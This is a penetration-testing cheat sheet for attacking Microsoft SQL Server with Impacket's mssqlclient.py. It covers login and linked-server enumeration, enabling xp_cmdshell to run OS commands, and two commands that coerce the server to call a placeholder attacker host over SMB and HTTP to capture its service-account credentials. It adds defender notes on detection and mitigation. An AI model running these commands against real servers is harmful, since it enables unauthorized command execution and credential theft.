#
mssqlclient.py
Great for enumerating and attacking SQL Server. This article was very helpful in putting together this cheat sheet.
#
Basic command to connect to a SQL Server instance (here on a non-standard port)
mssqlclient.py user@host -port 123
#
Connect to SQL Server with a domain account using Windows authentication and a non-standard port
mssqlclient.py domain.com/user@sql1.domain.com -port 123 -windows-auth
#
Enumerate SQL logins
enum_logins
#
Enumerate which logins the current login is allowed to impersonate
enum_impersonate
#
Enumerate linked SQL servers
enum_links
#
Enable xp_cmdshell (a server-wide sp_configure change that is written to the SQL Server error log, so it is easy to detect)
enable_xp_cmdshell
#
Run an OS command through xp_cmdshell (the command executes under the SQL Server service account)
xp_cmdshell whoami
#
Coerce an outbound SMB connection from the SQL Server host to an attacker-controlled system using xp_dirtree
-- xp_dirtree resolves the UNC path on the server side, so the SQL Server host itself opens the
-- outbound SMB session to the named host and authenticates with its own service identity.
-- Defender note: egress filtering of SMB (TCP 445) from database hosts blocks this, and
-- xp_dirtree calls whose argument is a UNC path are a high-signal detection.
EXEC xp_dirtree '\\YOUR.ATTACKING.IP.ADDRESS\doesntmatter';
#
Coerce an outbound HTTP connection from the SQL Server host to your attacker system using the OLE Automation procedures (sp_OACreate / sp_OAMethod / sp_OADestroy):
-- Creates a WinHttp.WinHttpRequest.5.1 COM object inside SQL Server, opens a GET to the given URL,
-- sets SetAutoLogonPolicy to 0 (always send credentials automatically, so the request may carry the
-- service account's Windows identity), sends it, then releases the object.
-- Kept on one line on purpose: mssqlclient.py submits each input line as its own batch, and the
-- @o variable declared here would be out of scope in any later batch.
-- Defender note: this only works when 'Ole Automation Procedures' is enabled (it is off by default);
-- leaving it disabled and restricting outbound HTTP from database hosts are the mitigations.
DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', 'http://DNS-NAME-OF-YOUR-ATTACK-BOX', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;